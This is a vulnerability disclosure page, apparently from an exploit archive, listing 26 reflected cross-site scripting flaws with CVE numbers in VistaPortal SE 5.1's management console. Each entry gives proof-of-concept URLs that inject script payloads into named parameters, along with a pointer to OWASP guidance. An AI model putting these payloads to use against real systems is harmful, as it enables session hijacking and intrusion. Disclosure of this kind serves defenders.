exploit the possibilities

VistaPortal SE 5.1 Cross Site Scripting

VistaPortal SE 5.1 Cross Site Scripting
Posted Dec 7, 2018
Authored by Rafael Pedrero

VistaPortal SE version 5.1 build 51029 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-19649, CVE-2018-19765, CVE-2018-19766, CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770, CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774, CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811, CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815, CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819, CVE-2018-19820, CVE-2018-19821, CVE-2018-19822
MD5 | 6edb126f7aa16dacfe59cfa661c90adb

VistaPortal SE 5.1 Cross Site Scripting

Change Mirror Download
Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,
CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,
CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,
CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,
CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,
CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,
CVE-2018-19820, CVE-2018-19821, CVE-2018-19822

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19649
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19765
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19766
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security
Resources&loginPath=_VP_Configuration,_VP_Security_Resources

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19767
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19768
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and
GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages&loginPath=PagePackageMainFolder
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page
Packages&loginPath=PagePackageMainFolder

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19769
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "UserProperties.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User
Properties&loginPath=_VP_Configuration,_VP_User_Propertie

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19770
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Users.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista
Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19771
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r)
Database
Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection

Vulnerable parameter: PropName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19772
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19773
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentUser.jsp" has reflected XSS via GroupId and
ConnPoolName parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19774
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19775
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19809
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19810
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19811
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159


Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19812
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via
GroupId parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F

Vulnerable parameter: GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19813
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19814
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19815
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS
via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19816
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has
reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19817
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected
XSS via ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19818
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19819
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19820
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19821
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19822
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
